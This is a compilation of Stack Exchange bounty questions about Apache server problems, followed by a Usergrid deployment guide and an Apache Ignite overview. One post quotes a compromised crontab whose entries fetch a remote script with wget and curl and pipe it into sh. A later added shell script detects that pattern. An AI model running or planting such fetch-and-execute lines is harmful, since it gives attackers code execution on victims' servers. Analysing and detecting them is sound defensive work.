#StackBounty: #apache #http-status-code-403 #plesk Random 403 error with apache 2.2 and Plesk 12.5

Bounty: 50

I face a strange random 403 error on a Debian server with Plesk 12.5 and Apache 2.2.

There are several domains on the server but only one domain faces this.

Randomly, it seems that it tries to display the directory listing instead of serving the index.php file. So, sometimes, it throws a 403 error and when I refresh the page, it’s ok with a 200 status.

In error_log, I read lots of :

[error] [client xxx.xxx.xxx.xxx] Directory index forbidden by Options directive

The DirectoryIndex was not present in httpd.conf file so I added the rule in additional directives for the domain via the Plesk Web Interface with no luck.

I’m kind of stuck with this.

Any help would be appreciated.

Let me know if you need more info.

Thank you.


Get this bounty!!!

#StackBounty: #php #apache #http-status-code-403 #fpm Random 403 errors with apache+php-fpm

Bounty: 100

On a server of mine, running Ubuntu 14.04.5 with Apache 2.4.23 and php-fpm 7.0.11, I’m getting random 403 errors.

I say “random” because the pages I see in logs with 403 run fine when I try them. Also, I experienced directly (I mean by visiting a site on the server with my browser) that I got a 403 error, then retried (just refreshing) and I got a 200.

The server is running some websites (about a dozen), with various kinds of solutions (a couple of WordPress, a few old spaghetti php apps, mostly modern apps based on Symfony framework).

I’d also be happy if someone can point me to some way to increase the verbosity of some logs, to try resolving this issue by myself. Currently I see the 403 errors in the apache logs of vhosts.



#StackBounty: #apache #polymer Polymer app not loading when using Apache reverse proxy

Bounty: 50

I have a Polymer app running on port 5901 of my VM, and am using Apache reverse proxy to serve the app from the following URL:

http://www.example.com/polymer

The problem is when I go to the URL in a browser, I can see the page title but the page is blank. I also get this error in the console:

Failed to load resource: the server responded with a status of 404 (Not Found)   src/home-page.html

I’m assuming that I have to somehow add the /polymer subdomain to the default URL for the app, but I’m not sure how to do this.



#StackBounty: #php #apache #caching #xampp How to disable Apache caching in Apache-XAMPP?

Bounty: 50

I am having this weird problem with my XAMPP-Apache.
I am making a log-in system where the form is posted to the redirect.php page.
I updated redirect.php but it is still showing me the same old result.
There is not even a single line to redirect (header fn call) it to another page, but it still redirects to the home.php page as it was doing in the older script.
I tried clearing the cache of my browser and changing the browser for testing but it didn’t work… I even tried rebooting the server but no change.
Please help me through…



#StackBounty: #linux #apache #shell #security #tomcat Shell script attack on Apache server, via a cron job of unknown origin

Bounty: 50

While running a project war on Apache tomcat server I found that the server has been compromised.

While running the war, an unknown cron job is running like this:

[root@PaygateApp2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

The downloaded logo.jpg contains a shell script which downloads malware.

I found a similar issue on this website below

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

and

https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux

I am unable to find the origin of this cron job scheduler in my whole code.

This cron job

What I wish to know is whether anyone has faced this issue,
and how I should go about finding the origin of the cron job in the code.

Note :

I am working on a JAVA(Struts 2)+jsp+javascript+jquery web project.

This cron job is running every time I am starting my tomcat with the war file of the project, but I am not able to find any scheduler for cron job in my code


Get this bounty!!!
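
A check for the pattern in the crontab quoted in the post above, added here as an example and not part of the original post: it flags crontab entries that fetch something with wget or curl and pipe it directly into a shell. The function names and the sample entries (with the documentation address 203.0.113.10) are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag crontab entries that fetch a remote resource and pipe
# it straight into a shell, the pattern in the tomcat crontab shown above.

# Constructed sample crontab (203.0.113.10 is a documentation address).
SAMPLE_CRONTAB='# constructed sample, not from a real host
*/11 * * * * wget -O - -q http://203.0.113.10/pics/logo.jpg|sh
*/12 * * * * curl http://203.0.113.10/pics/logo.jpg | /bin/bash
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsS http://localhost:8080/status | grep -q GREEN'

# flag_fetch_pipe_shell: reads crontab text on stdin and prints "LINE:entry"
# for every non-comment entry where wget or curl output is piped into sh,
# bash, dash, ksh or zsh (bare name or absolute path). Returns 0 when at
# least one entry is flagged, 1 when none is. It only catches the direct
# pipe form; download-then-execute in two steps needs a separate rule.
flag_fetch_pipe_shell() {
    awk '
        /^[ \t]*#/ { next }
        /(wget|curl)[ \t].*\|[ \t]*(\/[^ \t]*\/)?(ba|da|k|z)?sh([ \t;&]|$)/ {
            printf "%d:%s\n", NR, $0
            found = 1
        }
        END { exit !found }
    '
}

# scan_user_crontabs: apply the check to every local account's crontab,
# prefixing each hit with the account name. Needs root, like the
# `crontab -l -u tomcat` call in the post.
scan_user_crontabs() {
    cut -d: -f1 /etc/passwd | while read -r user; do
        crontab -l -u "$user" 2>/dev/null | flag_fetch_pipe_shell |
            sed "s/^/$user:/"
    done
}

# Demo on the constructed sample: prints entries 2 and 3.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_fetch_pipe_shell || true
```
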

#StackBounty: #apache #denial-of-service How to prove the Apache web server is not accepting connections anymore because of a denial o…

Bounty: 50

I have a network dump (PCAP file) from a “conversation” between a web server apache (192.168.1.2) and some clients:

PCAP File

What should I look for to prove that the server buffer (or TCP WINDOW) is full? I received a 403 error (error.log). I know it was a denial of service attack (slowloris).



Installing Apache UserGrid on linux

About the Project

Apache Usergrid is an open-source Backend-as-a-Service (BaaS or mBaaS) composed of an integrated distributed NoSQL database, application layer and client tier with SDKs for developers looking to rapidly build web and/or mobile applications. It provides elementary services and retrieval features like:

  • User Registration & Management
  • Data Storage
  • File Storage
  • Queues
  • Full Text Search
  • Geolocation Search
  • Joins

It is a multi-tenant system designed for deployment to public cloud environments (such as Amazon Web Services, Rackspace, etc.) or to run on traditional server infrastructures so that anyone can run their own private BaaS deployment.

For architects and back-end teams, it aims to provide a distributed, easily extendable, operationally predictable and highly scalable solution. For front-end developers, it aims to simplify the development process by enabling them to rapidly build and operate mobile and web applications without requiring backend expertise.

Usergrid 2.1.0 Deployment Guide

Though the Usergrid Deployment guide seems to be simple enough, I faced certain hiccups and it took me about 4 days to figure out what I was doing wrong.

This document explains how to deploy the Usergrid v2.1.0 Backend-as-a-Service (BaaS), which comprises the Usergrid Stack, a Java web application, and the Usergrid Portal, which is an HTML5/JavaScript application.

Prerequisites

Below are the software requirements for Usergrid 2.1.0 Stack and Portal. You can install them all on one computer for development purposes, and for deployment you can deploy them separately using clustering.

Linux or a UNIX-like system (Usergrid may run on Windows, but we haven’t tried it)

Download the Apache Usergrid 2.1.0 binary release from the official Usergrid releases page:

After untarring, the files that you need for deploying the Usergrid Stack and Portal are ROOT.war and usergrid-portal.tar.

Stack STEP #1: Setup Cassandra

As mentioned in prerequisites, follow the installation guide given in link

Usergrid uses Cassandra’s Thrift protocol
Before starting cassandra, on Cassandra 2.x releases you MUST enable Thrift by setting start_rpc in your cassandra.yaml file:

    #Whether to start the thrift rpc server.
    start_rpc: true

Note: DataStax no longer supports the DataStax Community version of Apache Cassandra or the DataStax Distribution of Apache Cassandra. It is best to follow the Apache documentation.

Once you are up and running make a note of these things:

  • The name of the Cassandra cluster
  • Hostname or IP address of each Cassandra node
    • in case of same machine as Usergrid, then localhost. Usergrid would then be running on single machine embedded mode.
  • Port number used for Cassandra RPC (the default is 9160)
  • Replication factor of Cassandra cluster

Stack STEP #2: Setup ElasticSearch

Usergrid also needs access to at least one ElasticSearch node. As with Cassandra, you can set up a single ElasticSearch node on your computer, and you should run a cluster in production.

Steps:

  • Download and unzip Elasticsearch
  • Run bin/elasticsearch (or bin/elasticsearch -d on Linux to run it as a background process, or bin\elasticsearch.bat on Windows)
  • Run curl http://localhost:9200/

Once you are up and running make a note of these things:

  • The name of the ElasticSearch cluster
  • Hostname or IP address of each ElasticSearch node
    • in case of same machine as Usergrid, then localhost. Usergrid would then be running on single machine embedded mode.
  • Port number used for ElasticSearch protocol (the default is 9200)

Stack STEP #3: Setup Tomcat

The Usergrid Stack is contained in a file named ROOT.war, a standard Java EE WAR ready for deployment to Tomcat. On each machine that will run the Usergrid Stack you must install the Java SE 8 JDK and Tomcat 7+.

Stack STEP #4: Configure Usergrid Stack

You must create a Usergrid properties file called usergrid-deployment.properties. The properties in this file tell Usergrid how to communicate with Cassandra and ElasticSearch, and how to form URLs using the hostname you wish to use for Usergrid. There are many properties that you can set to configure Usergrid.

Once you have created your Usergrid properties file, place it in the Tomcat lib directory. On a Linux system, that directory is probably located at /path/to/tomcat7/lib/

The Default Usergrid Properties File

You should review the defaults in the above file. To get you started, let’s look at a minimal example properties file that you can edit and use as your own.

Please note that if you are installing Usergrid on the same machine as Cassandra Server, then set the following property to true

   # Tell Usergrid that Cassandra is embedded.
   cassandra.embedded=true

Stack STEP #5: Deploy ROOT.war to Tomcat

The next step is to deploy the Usergrid Stack software to Tomcat. There are a variety of ways of doing this and the simplest is probably to place the Usergrid Stack ROOT.war file into the Tomcat webapps directory, then restart Tomcat.

Look for messages like this, which indicate that the ROOT.war file was deployed:

INFO: Starting service Catalina
Jan 29, 2016 1:00:32 PM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.59
Jan 29, 2016 1:00:32 PM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deploying web application archive /usr/share/tomcat7/webapps/ROOT.war

Does it work?

You can use curl:

curl http://localhost:8080/status

If you get a JSON file of status data, then you’re ready to move to the next step. You should see a response that begins like this:

{
  "timestamp" : 1454090178953,
  "duration" : 10,
  "status" : {
    "started" : 1453957327516,
    "uptime" : 132851437,
    "version" : "201601240200-595955dff9ee4a706de9d97b86c5f0636fe24b43",
    "cassandraAvailable" : true,
    "cassandraStatus" : "GREEN",
    "managementAppIndexStatus" : "GREEN",
    "queueDepth" : 0,
    "org.apache.usergrid.count.AbstractBatcher" : {
      "add_invocation" : {
        "type" : "timer",
        "unit" : "microseconds",
        … etc. …

Initialize the Usergrid Database

Next, you must initialize the Usergrid database, index and query systems.

To do this you must issue a series of HTTP operations using the superuser credentials. You can only do this if Usergrid is configured to allow superuser login via the property usergrid.sysadmin.login.allowed=true; if you used the above example properties file, it is allowed.

The three operations you must perform are expressed by the curl commands below and, of course, you will have to change the password test to match the superuser password that you set in your Usergrid properties file.

curl -X PUT http://localhost:8080/system/database/setup -u superuser:test
curl -X PUT http://localhost:8080/system/database/bootstrap -u superuser:test
curl -X GET http://localhost:8080/system/superuser/setup -u superuser:test

When you issue each of those curl commands, you should see a success message like this:

{
  "action" : "cassandra setup",
  "status" : "ok",
  "timestamp" : 1454100922067,
  "duration" : 374
}
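
The initialization sequence above as a script, added here as an example and not part of the original guide: it runs the three calls in order, stops at the first response that lacks "status" : "ok", and hands curl the credentials through a config on stdin (-K -) so the superuser password does not show up in the process list the way -u superuser:test does. The environment variable names USERGRID_URL and USERGRID_SUPERUSER_PW and the function names are assumptions made for this example.

```shell
#!/bin/sh
# Added example: run the guide's three initialization calls, keep the
# superuser password out of argv, and stop at the first failed call.
# USERGRID_URL and USERGRID_SUPERUSER_PW are names chosen for this example.

# response_ok: reads a JSON response on stdin and succeeds only if it
# carries "status" : "ok", the shape of the success message shown above.
response_ok() {
    grep -Eq '"status"[[:space:]]*:[[:space:]]*"ok"'
}

# usergrid_call METHOD PATH: curl reads the credentials from a config on
# stdin (-K -), so "superuser:<password>" never appears on the command line.
# Assumes the password contains no double quote or backslash.
usergrid_call() {
    printf 'user = "superuser:%s"\n' "$USERGRID_SUPERUSER_PW" |
        curl -sS -K - -X "$1" "${USERGRID_URL:-http://localhost:8080}$2"
}

# usergrid_init: the three operations from the guide, in order. Prints one
# "ok" line per successful call and returns 1 at the first failure.
usergrid_init() {
    for step in 'PUT /system/database/setup' \
                'PUT /system/database/bootstrap' \
                'GET /system/superuser/setup'; do
        set -- $step
        if usergrid_call "$1" "$2" | response_ok; then
            echo "ok: $1 $2"
        else
            echo "FAILED: $1 $2" >&2
            return 1
        fi
    done
}

# Runs only when a password has been provided in the environment.
if [ -n "${USERGRID_SUPERUSER_PW:-}" ]; then
    usergrid_init
fi
```
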

Now that you’ve gotten Usergrid up and running, you’re ready to deploy the Usergrid Portal.

Deploying the Usergrid Portal

The Usergrid Portal is an HTML5/JavaScript application, a bunch of static files that can be deployed to any web server, e.g. Apache HTTPD or Tomcat.

To deploy the Portal to a web server, un-tar the usergrid-portal.tar file into the directory that serves as the root directory of your web pages.

Once you have done that there is one more step. You need to configure the portal so that it can find the Usergrid stack. You do that by editing the portal/config.js and changing this line:

Usergrid.overrideUrl = 'http://localhost:8080/';

Set it to the hostname that you will be using for your Usergrid installation.

I have deployed a sample instance and tested the same. You can find the system ready configurations in TechUtils repository

#StackBounty: #javascript #node.js #apache #gulp #browser-sync Gulp browser-sync not monitoring and injecting files

Bounty: 50

I have following directory structure

workspace
  |--dev
      |--proj
          |--css 
              |--style.css
          |--js
              |--app.js
          |index.php
          |something.html
          |gulpfile.js
          |package.json

I had installed a vhost named dev.local on ...workspacedev. As you can see, I have created a gulpfile.js in my proj directory.

Now if I run the gulp browser-sync command, my browser window opens showing the following URL: http://dev.local:3000/proj/. It perfectly opens my index.php page, but if I do any modification in my files they are not monitored and are not injected into my page. So there is no auto reload of my page.

Here is my gulpfile.js

var gulp = require('gulp');
var bs = require('browser-sync').create(); // create a browser sync instance.

gulp.task('browser-sync', function() {
    bs.init({
        open: 'external',
        host: 'dev.local',
        proxy: 'dev.local/proj'
    });
});

gulp.task('watch', ['browser-sync'], function () {
    gulp.watch("*.html,*.php,css/*.css,js/*.js").on('change', bs.reload);
});

Here is the output of my terminal

gulp browser-sync
[12:14:12] Using gulpfile ~/Documents/workspace/dev/proj/gulpfile.js
[12:14:12] Starting 'browser-sync'...
[12:14:12] Finished 'browser-sync' after 15 ms
[BS] Proxying: http://dev.local
[BS] Access URLs:
 ------------------------------------------------
       Local: http://localhost:3000/proj
    External: http://dev.local:3000/proj
 ------------------------------------------------
          UI: http://localhost:3001
 UI External: http://dev.local:3001
 ------------------------------------------------

I had already searched SO for various solutions but to no avail. Please help, I am stuck.

UPDATE

I am using BrowserSync version 2.18.8 and gulp version 3.9.1



#StackBounty: Unable to modify(update) posts – Page not found

Bounty: 100

For a couple of days I have been experiencing issues with modifying some of my posts.
When I try to modify the content of a post, I get a 404 error, telling me that the page is not found.

Doing Google research, with all basic tests, clear cache, browser, enable/disable plugins, changing permalinks, etc, I’ve found this on WP forum, saying that Apache’s ModSecurity is causing issues:

https://wordpress.org/support/topic/clicking-the-post-draft-button-sometimes-redirects-a-404-not-found-page/


https://wordpress.org/support/topic/404-page-not-found-when-savingupdating-a-postspage/

However, this doesn’t work for me, because I don’t have the option in cPanel to disable ModSecurity – it is disabled by the hosting company.

I’ve got this response from them:

Mod_sec is an important server level security feature. We are not
going to disable mod_sec.

Certain WordPress posts (such as ones that appear to be SQL injection
attacks) may trigger mod_sec, but it certainly is not all WordPress
posts.

Is there any work-around to solve this? I have SSH access, a bit limited, but it may help.

Also, I am not 100% sure about it, but I’ve noticed that I can (haven’t tested all) update my old posts.

Posts that are ~ 5-6m old are throwing 404 error.
WP version is 4.7.2

EDIT

The only option I have now is to do a backup of the production site, load it on my localhost, update the posts and push it back to production.

However, this isn’t convenient at all. 🙁
Does anyone have a solution?

Please help!
Thanks!



Apache Ignite: What is Ignite?

Apache Ignite(TM) In-Memory Data Fabric is a high-performance, integrated and distributed in-memory platform for computing and transacting on large-scale data sets in real-time, orders of magnitude faster than possible with traditional disk-based or flash-based technologies.


FEATURES

You can view Ignite as a collection of independent, well-integrated, in-memory components geared to improve performance and scalability of your application. Some of these components include:


Apache Ignite APIs

Apache Ignite has a rich set of APIs that are covered throughout the documentation. The APIs are implemented in the form of native libraries for major languages and technologies such as Java, .NET and C++, and by supporting a variety of protocols like REST, Memcached or Redis.

The documentation that is located under this domain is mostly related to Java. Refer to the following documentation sections and domains to learn more about alternative technologies and protocols you can use to connect to and work with an Apache Ignite cluster:
